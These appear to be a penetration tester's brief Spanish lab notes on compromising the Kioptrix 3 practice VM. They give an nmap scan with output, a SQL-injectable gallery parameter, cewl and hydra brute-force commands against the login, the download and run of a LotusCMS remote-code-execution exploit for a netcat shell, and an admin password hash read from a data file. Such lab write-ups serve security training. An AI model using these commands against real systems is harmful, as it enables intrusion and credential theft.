PROBAR
GET /gallery/gallery.php?id=*&sort=dateuploaded # ID Vulnerable a SQL Injection

nmap -sV -A -Pn 192.168.111.131

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...

OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33

Como indica el creador de la web, modificamos el /etc/hosts para añadir 192.168.111.131 kioptrix3.com

Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
LotusCMS
Manjeet Singh Sawhney
index.php?page=index
index.php?system=Blog
http://kioptrix3.com/gallery
loneferret o loneferret!
gadmin gadmin.php

Probamos bruteforce sin éxito
cewl -w DICC-KIOPT.txt --with-numbers -a -e -d 5 -v http://kioptrix3.com/
hydra -l loneferret -P DICC-KIOPT.txt -s 80 -f -t 5 -vV kioptrix3.com http-post-form "/index.php?system=Admin&page=loginSubmit:username=^USER^&password=^PASS^:Incorrect username or password"

wget https://raw.githubusercontent.com/Hood3dRob1n/LotusCMS-Exploit/master/lotusRCE.sh
bash lotusRCE.sh http://kioptrix3.com
Seleccionamos 1 (NetCat -e)

cd data/users
more admin.dat
|318d8dd409db395f0317efa71b3bad13e1fb9857|administrator|bla@bla.com
